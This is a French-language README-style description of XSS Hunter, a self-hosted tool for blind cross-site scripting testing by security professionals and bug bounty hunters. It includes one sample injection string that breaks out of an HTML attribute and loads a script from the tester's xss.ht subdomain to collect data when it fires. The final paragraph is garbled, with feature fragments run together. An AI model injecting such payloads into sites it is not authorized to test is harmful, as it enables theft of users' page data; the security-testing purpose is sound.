
Le service XSS Hunter - une version portable de XSSHunter.com
Voir ici pour plus d'infos : https://github.com/mandatoryprogrammer/xsshunter-express
Ceci est une version portable du code source qui fonctionne sur https://xsshunter.com. Il est conçu pour être facilement installable sur n'importe quel serveur pour les professionnels de la sécurité et les chasseurs de primes de bogues qui souhaitent tester les XSS de manière beaucoup plus puissante.
Si vous ne voulez pas configurer ce logiciel et préférez simplement commencer à tester, consultez https://xsshunter.com .
Veuillez consulter https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ pour des informations sur la configuration de XSS Hunter sur votre propre serveur.
Lors de votre inscription, vous créerez un domaine court spécial comme yoursubdomain.xss.ht qui identifie vos vulnérabilités XSS et héberge votre payload. Vous utilisez ensuite ce sous-domaine dans vos tests XSS, avec des tentatives d'injection comme "><script src=//yoursubdomain.xss.ht></script>. XSS Hunter servira automatiquement des sondes XSS et collectera les informations résultantes lorsqu'elles se déclenchent.
crossdomain.xml sur des systèmes internes qui ne seraient normalement pas accessibles./app et d'enregistrer la page en tant qu'application web sur l'écran d'accueil de votre iPhone.Tout le code a été créé par moi et (pour cette raison) n'est probablement pas une bonne pratique et a absolument besoin d'optimisation/nettoyage. Toute pull request est appréciée !